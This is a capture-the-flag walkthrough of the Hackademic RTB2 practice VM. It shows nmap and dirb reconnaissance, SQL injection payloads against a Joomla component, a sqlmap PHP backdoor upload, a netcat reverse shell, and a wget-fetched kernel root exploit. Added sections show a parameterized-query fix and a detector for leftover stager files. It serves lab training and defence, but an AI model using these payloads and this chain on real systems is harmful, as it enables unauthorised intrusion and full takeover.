This is part 2 of my Hackademic series. Sure, it is a Happy New Year walkthrough for me. Normally I really love sitting in front of my computer. My girlfriend is also away from me, so what am I doing right now?
I love the pain and am trying to write a walkthrough at this time. I am not good at English, but I am still learning how to explain things to my readers, because my childhood was so troubled that I was late to enter the computer field. I started at 25 and try to learn many things that interest me. OK. Talk less, do more.
After discovering my local network, I know my target is 192.168.2.101, and I scan it with nmap.
┌─[[email protected]]─[~/Desktop/rtb2]
└──> nmap 192.168.2.101

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 20:40 +0630
Nmap scan report for 192.168.2.101
Host is up (0.000075s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 08:00:27:23:34:E5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Port 80 is open as usual, but port 666 is reported as filtered.
In nmap, filtered means no reply came back for the probe at all: a firewall or other packet filter is dropping the packets, so nmap cannot tell whether the port is open or closed.
OK, let's try another nmap option to get past the filter. I use the --mtu (Maximum Transmission Unit) option (nmap also accepts it written as -mtu, as below), which splits each probe into small IP fragments; the value must be a multiple of 8. A packet filter that matches on the TCP header without reassembling fragments first can let the pieces through, and the target reassembles them.
┌─[[email protected]]─[~/Desktop/rtb2]
└──> nmap -mtu 24 192.168.2.101

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 20:46 +0630
Nmap scan report for 192.168.2.101
Host is up (0.000098s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
80/tcp  open  http
666/tcp open  doom
MAC Address: 08:00:27:23:34:E5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
Yes, now both ports show as open. Let's try a dirb scan first.
┌─[[email protected]]─[~/Desktop/rtb2]
└──> dirb http://192.168.2.101

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec 31 20:48:22 2017
URL_BASE: http://192.168.2.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.2.101/ ----
+ http://192.168.2.101/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.2.101/check (CODE:200|SIZE:324)
+ http://192.168.2.101/index (CODE:200|SIZE:1324)
+ http://192.168.2.101/index.php (CODE:200|SIZE:1324)
==> DIRECTORY: http://192.168.2.101/javascript/
==> DIRECTORY: http://192.168.2.101/phpmyadmin/

-----------------
END_TIME: Sun Dec 31 20:48:47 2017
DOWNLOADED: 46120 - FOUND: 11
Found a phpMyAdmin login page. But let's also run the same scan against port 666.
┌─[[email protected]]─[~/Desktop/rtb2]
└──> dirb http://192.168.2.101:666

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec 31 20:50:41 2017
URL_BASE: http://192.168.2.101:666/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.2.101:666/ ----
==> DIRECTORY: http://192.168.2.101:666/administrator/
==> DIRECTORY: http://192.168.2.101:666/cache/
+ http://192.168.2.101:666/cgi-bin/ (CODE:403|SIZE:290)
==> DIRECTORY: http://192.168.2.101:666/components/
+ http://192.168.2.101:666/configuration (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.2.101:666/images/
==> DIRECTORY: http://192.168.2.101:666/includes/
+ http://192.168.2.101:666/index (CODE:200|SIZE:6118)
+ http://192.168.2.101:666/index.php (CODE:200|SIZE:6118)
+ http://192.168.2.101:666/index2 (CODE:200|SIZE:3559)
==> DIRECTORY: http://192.168.2.101:666/javascript/
==> DIRECTORY: http://192.168.2.101:666/language/
==> DIRECTORY: http://192.168.2.101:666/libraries/
+ http://192.168.2.101:666/LICENSE (CODE:200|SIZE:17816)
==> DIRECTORY: http://192.168.2.101:666/logs/
==> DIRECTORY: http://192.168.2.101:666/media/
==> DIRECTORY: http://192.168.2.101:666/modules/
==> DIRECTORY: http://192.168.2.101:666/phpmyadmin/
==> DIRECTORY: http://192.168.2.101:666/plugins/
+ http://192.168.2.101:666/robots (CODE:200|SIZE:304)
+ http://192.168.2.101:666/robots.txt (CODE:200|SIZE:304)
+ http://192.168.2.101:666/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.2.101:666/templates/
==> DIRECTORY: http://192.168.2.101:666/tmp/
Interesting files again! Let's check them in the web browser.
First I try port 80. I found a user login form. I tried to log in with a SQL injection login query, but it failed, and then I tried to brute-force the username and password. That also failed after a few minutes. So I checked the other port, 666.
http://192.168.2.101:666/
I noticed the icon in the page title. Yes, it is the Joomla CMS. I explored some links on the site and found a vulnerability in the letter parameter. Let's test whether it is injectable by appending a single quote.
http://192.168.2.101:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27&Itemid=3
Boom! An error message greets me.
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' GROUP BY title ORDER BY title' at line 1 SQL=SELECT id, title FROM jos_content WHERE state = 1 AND UPPER(title) LIKE 'List of content items...'%' GROUP BY title ORDER BY title LIST OF CONTENT ITEMS...'
The injected quote closed the LIKE string literal early, so the remainder of the statement (%' GROUP BY title ORDER BY title) became a syntax error. That proves the parameter is pasted into the query unescaped. The error also leaks the whole statement: the jos_ table prefix (the Joomla 1.5 default), the two selected columns (id, title), and the fact that the value is used as a LIKE prefix with a trailing % wildcard.
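To make the leaked statement concrete, here is an added example (my own code, not from the walkthrough and not Joomla's) that rebuilds the component's query over a constructed SQLite stand-in for jos_content and jos_users. The table contents, the admin row and the hash string are made up for the demo. It runs the author's single-quote probe against a vulnerable string-built query and a parameterized one, then sends a two-column UNION payload of the same shape sqlmap settles on later in the post, to show what the error actually gives away:

```python
import sqlite3

# Constructed stand-in for the two Joomla tables involved (sample data, not from the target).
SCHEMA = """
CREATE TABLE jos_content (id INTEGER, title TEXT, state INTEGER);
CREATE TABLE jos_users  (id INTEGER, username TEXT, password TEXT);
INSERT INTO jos_content VALUES (1, 'Welcome to Joomla!', 1),
                               (2, 'Unpublished draft', 0);
INSERT INTO jos_users   VALUES (62, 'admin', 'example-hash-not-real');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, letter):
    """Builds the statement the way the leaked error shows it was built:
    the raw parameter is pasted between quotes in front of the % wildcard."""
    sql = ("SELECT id, title FROM jos_content WHERE state = 1 "
           "AND UPPER(title) LIKE '" + letter + "%' "
           "GROUP BY title ORDER BY title")
    return conn.execute(sql).fetchall()


def safe_lookup(conn, letter):
    """Same query with a bound parameter: a quote in the value is data, not syntax."""
    sql = ("SELECT id, title FROM jos_content WHERE state = 1 "
           "AND UPPER(title) LIKE ? GROUP BY title ORDER BY title")
    return conn.execute(sql, (letter + "%",)).fetchall()


def quote_probe(conn, lookup, value="List of content items..."):
    """The manual test from the walkthrough: does appending one single quote
    turn a working request into a database error? True means injectable."""
    try:
        lookup(conn, value)            # baseline request must succeed
        lookup(conn, value + "'")      # the probe
        return False
    except sqlite3.OperationalError:   # SQLite's counterpart of MySQL error 1064
        return True


# Two-column UNION (the query selects id, title); the trailing comment swallows
# the dangling %' GROUP BY ... ORDER BY ... tail that would otherwise break the syntax.
UNION_PAYLOAD = "zzz' UNION ALL SELECT username, password FROM jos_users-- "


if __name__ == "__main__":
    db = connect()
    print("vulnerable injectable:", quote_probe(db, vulnerable_lookup))
    print("safe injectable:      ", quote_probe(db, safe_lookup))
    print("vulnerable + UNION:   ", vulnerable_lookup(db, UNION_PAYLOAD))
    print("safe + UNION:         ", safe_lookup(db, UNION_PAYLOAD))
```

SQLite raises OperationalError where MySQL answered with error 1064, and its LIKE is case-insensitive for ASCII much as MySQL's is under the default collation, so the probe and the UNION behave the same way the post shows. The fix is the bound parameter: the same payload against safe_lookup is just a title prefix that matches nothing.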
Now it's time to exploit it with sqlmap. Normally I first find the current user, database name, tables and columns and dump the data, but this time I first test whether it lets me get an os-shell. sqlmap's --os-shell writes a small PHP stager into the web root through the database (INTO OUTFILE/DUMPFILE style), so it needs the FILE privilege (hence --is-dba first) and a web-root directory that the MySQL process is allowed to write to.
┌─[[email protected]]─[~/Desktop/rtb2] └──> sqlmap -u "http://192.168.2.101:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -p letter --is-dba --os-shell
[*] starting at 21:02:13

[21:02:14] [INFO] resuming back-end DBMS 'mysql'
[21:02:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: letter (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: option=com_abc&view=abc&letter=List of content items...' AND (SELECT 5790 FROM(SELECT COUNT(*),CONCAT(0x716b706271,(SELECT (ELT(5790=5790,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ycDm'='ycDm&Itemid=3

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: option=com_abc&view=abc&letter=List of content items...' UNION ALL SELECT CONCAT(0x716b706271,0x474b72455870676847716549514648576d77676c486b454d41696d6e786c65714d4143534855416f,0x7162767a71),NULL-- TSkf&Itemid=3
---
[21:02:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[21:02:14] [INFO] testing if current user is DBA
[21:02:14] [INFO] fetching current user
current user is DBA: True
[21:02:14] [INFO] going to use a web backdoor for command prompt
[21:02:14] [INFO] fingerprinting the back-end DBMS operating system
[21:02:14] [WARNING] reflective value(s) found and filtering out
[21:02:14] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[21:02:32] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[21:02:34] [INFO] retrieved web server absolute paths: '/index~.php'
[21:02:34] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[21:02:34] [WARNING] unable to upload the file stager on '/var/www/'
[21:02:34] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[21:02:35] [WARNING] expect junk characters inside the file as a leftover from UNION query
[21:02:35] [INFO] the remote file '/var/www/tmpuuyqk.php' is larger (701 B) than the local file '/tmp/sqlmap5AvFX01768/tmpezMiOe' (700B)
[21:02:35] [INFO] heuristics detected web page charset 'ascii'
[21:02:35] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.2.101:666/tmpuuyqk.php
[21:02:35] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.2.101:666/tmpbkdzx.php
[21:02:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls -al
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 288
drwxrwxrwx 19 p0wnbox  p0wnbox   4096 Dec 31 16:32 .
drwxr-xr-x 16 root     root      4096 Jan 17  2011 ..
-rw-rw-rw-  1 root     root     76539 Nov  3  2010 CHANGELOG.php
-rw-rw-rw-  1 root     root      1172 Jan 26  2010 COPYRIGHT.php
-rw-rw-rw-  1 root     root     14918 Nov  2  2010 CREDITS.php
-rw-rw-rw-  1 root     root      4344 Jan 26  2010 INSTALL.php
-rw-rw-rw-  1 root     root     17816 Jan 17  2009 LICENSE.php
-rw-rw-rw-  1 root     root     27986 Jan 26  2010 LICENSES.php
-rwxrwxrwx  1 root     root     21697 Jan 17  2011 Untitledt.png
drwxrwxrwx  7 root     root      4096 Nov  3  2010 _installation
drwxrwxrwx  2 root     root      4096 Jan 22  2011 administrator
drwxrwxrwx  2 root     root      4096 Nov  3  2010 cache
drwxrwxrwx 15 root     root      4096 Jan 22  2011 components
-rw-rw-rw-  1 www-data www-data  1793 Jan 17  2011 configuration.php
-rw-rw-rw-  1 root     root      3411 Jan 26  2010 configuration.php-dist
-rw-rw-rw-  1 root     root      2773 Jan 26  2010 htaccess.txt
drwxrwxrwx  6 root     root      4096 Nov  3  2010 images
drwxrwxrwx  8 root     root      4096 Nov  3  2010 includes
-rw-rw-rw-  1 root     root      2049 Jan 26  2010 index.php
-rw-rw-rw-  1 root     root       588 Jan 26  2010 index2.php
drwxrwxrwx  4 root     root      4096 Nov  3  2010 language
drwxrwxrwx 16 root     root      4096 Nov  3  2010 libraries
drwxrwxrwx  2 root     root      4096 Nov  3  2010 logs
drwxrwxrwx  3 root     root      4096 Nov  3  2010 media
drwxrwxrwx 22 root     root      4096 Nov  3  2010 modules
drwxr-xr-x 11 root     root      4096 Jan 17  2011 [email protected]$!
drwxrwxrwx 11 root     root      4096 Nov  3  2010 plugins
-rw-rw-rw-  1 root     root       304 Aug  8  2006 robots.txt
drwxrwxrwx  7 root     root      4096 Jan 17  2011 templates
drwxrwxrwx  2 root     root      4096 Jan 22  2011 tmp
-rwxr-xr-x  1 www-data www-data   908 Dec 31 16:32 tmpbkdzx.php
-rw-rw-rw-  1 mysql    mysql        0 Dec 31 16:32 tmpukgwv.php
-rw-rw-rw-  1 mysql    mysql      701 Dec 31 16:32 tmpuuyqk.php
drwxrwxrwx  2 root     root      4096 Jan 29  2011 welcome
drwxrwxrwx  4 root     root      4096 Nov  3  2010 xmlrpc
-rw-rw-rw-  1 root     root       177 Jan 17  2011 xxx.html
---
os-shell>
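The listing above is also what a defender would look at afterwards: the stager files are owned by mysql (the database wrote them into the web root), the backdoor is an executable PHP file owned by www-data, and the web root itself is world-writable. The following is an added example, my own code rather than anything from the walkthrough, that parses ls -al output and flags those three indicators. The sample listing is a constructed excerpt of the lines shown above, and the tmp<five letters>.php name check is a heuristic taken from the names sqlmap produced in this run, so treat hits as leads to inspect, not proof:

```python
import re
from collections import namedtuple

Entry = namedtuple("Entry", "mode links owner group size name")

# Constructed sample input: an excerpt of the `ls -al /var/www` output above.
LISTING = """\
total 288
drwxrwxrwx 19 p0wnbox  p0wnbox   4096 Dec 31 16:32 .
drwxr-xr-x 16 root     root      4096 Jan 17  2011 ..
-rw-rw-rw-  1 www-data www-data  1793 Jan 17  2011 configuration.php
-rw-rw-rw-  1 root     root      2049 Jan 26  2010 index.php
-rwxr-xr-x  1 www-data www-data   908 Dec 31 16:32 tmpbkdzx.php
-rw-rw-rw-  1 mysql    mysql        0 Dec 31 16:32 tmpukgwv.php
-rw-rw-rw-  1 mysql    mysql      701 Dec 31 16:32 tmpuuyqk.php
"""

# mode links owner group size month day time-or-year name (name may contain spaces)
LS_LINE = re.compile(r"^(\S{10})\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+\S+\s+\d+\s+\S+\s+(.+)$")

# Heuristic: sqlmap's stager/backdoor names in this run were tmp + five lowercase letters + .php
SQLMAP_TMP = re.compile(r"^tmp[a-z]{5}\.php$")


def parse_listing(text):
    """Turn `ls -al` output into Entry tuples; lines that do not match (e.g. 'total N') are skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line.rstrip())
        if m:
            mode, links, owner, group, size, name = m.groups()
            entries.append(Entry(mode, int(links), owner, group, int(size), name))
    return entries


def find_stager_artifacts(entries, db_user="mysql", web_user="www-data"):
    """Return {name: [reasons]} for entries that look like a database-written
    web shell or a web root that made such a write possible."""
    findings = {}

    def flag(name, reason):
        findings.setdefault(name, []).append(reason)

    for e in entries:
        # mode string layout: type, then rwx for user (1-3), group (4-6), other (7-9)
        if e.name == "." and e.mode.startswith("d") and e.mode[8] == "w":
            flag(e.name, "web root is world-writable")
        if not e.name.endswith(".php"):
            continue
        if e.owner == db_user:
            flag(e.name, "PHP file owned by the DB user: written via INTO OUTFILE/DUMPFILE")
        elif e.owner == web_user and "x" in e.mode[1:4]:
            flag(e.name, "executable PHP owned by the web server user: dropped at runtime")
        if SQLMAP_TMP.match(e.name):
            flag(e.name, "sqlmap-style tmp<5 letters>.php name")
    return findings


if __name__ == "__main__":
    for name, reasons in sorted(find_stager_artifacts(parse_listing(LISTING)).items()):
        print(name, "->", "; ".join(reasons))
```

configuration.php is also owned by www-data (the Joomla installer writes it), but it is not executable and has an old timestamp, so it is left alone; the ownership rule is what separates a normal install artifact from something the database server wrote into the document root.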
The upload only worked because the MySQL account has the FILE privilege (current user is DBA: True) and /var/www is world-writable (drwxrwxrwx), which is why the stager files in the listing are owned by mysql. Now let's get a proper shell: connect back to a netcat listener and upgrade it with Python.
┌─[[email protected]]─[~/Desktop/rtb2]
└──> nc -lvp 6666
listening on [any] 6666 ...
192.168.2.101: inverse host lookup failed: Unknown host
connect to [192.168.2.118] from (UNKNOWN) [192.168.2.101] 37336
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www$ id;uname -a
id;uname -a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux
[email protected]:/var/www$
Let's look for a kernel exploit on Exploit-DB. I noticed in the last walkthrough that the exploit for this kernel version can work. Exploit-DB 15285 is Dan Rosenberg's RDS socket exploit (CVE-2010-3904) for Linux >= 2.6.30, which covers the 2.6.32-24 kernel shown above. A kernel exploit can panic the box, so snapshot the VM before running one. OK, let's try it.
drwx------ 2 gdm gdm 4096 Dec 31 2017 pulse-PKdhtXMmr18n
[email protected]:/tmp$ wget https://www.exploit-db.com/raw/15285 -O lol.c --no-check-certificate
wget https://www.exploit-db.com/raw/15285 -O lol.c --no-check-certificate
--2017-12-31 16:37:22--  https://www.exploit-db.com/raw/15285
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/plain]
Saving to: `lol.c'

100%[======================================>] 7,155       --.-K/s   in 0s

2017-12-31 16:37:23 (500 MB/s) - `lol.c' saved [7155/7155]

[email protected]:/tmp$ gcc lol.c
gcc lol.c
[email protected]:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/tmp$ ./a.out
./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08cac4c
[+] Resolved default_security_ops to 0xc0773340
[+] Resolved cap_ptrace_traceme to 0xc02f5060
[+] Resolved commit_creds to 0xc016dd80
[+] Resolved prepare_kernel_cred to 0xc016e0c0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id;whoami
id;whoami
uid=0(root) gid=0(root)
root
Bingo! Time to read the flag in the root directory. Finally, I decoded the base64 and got the secret photo!
Thanks for reading. Happy hacking!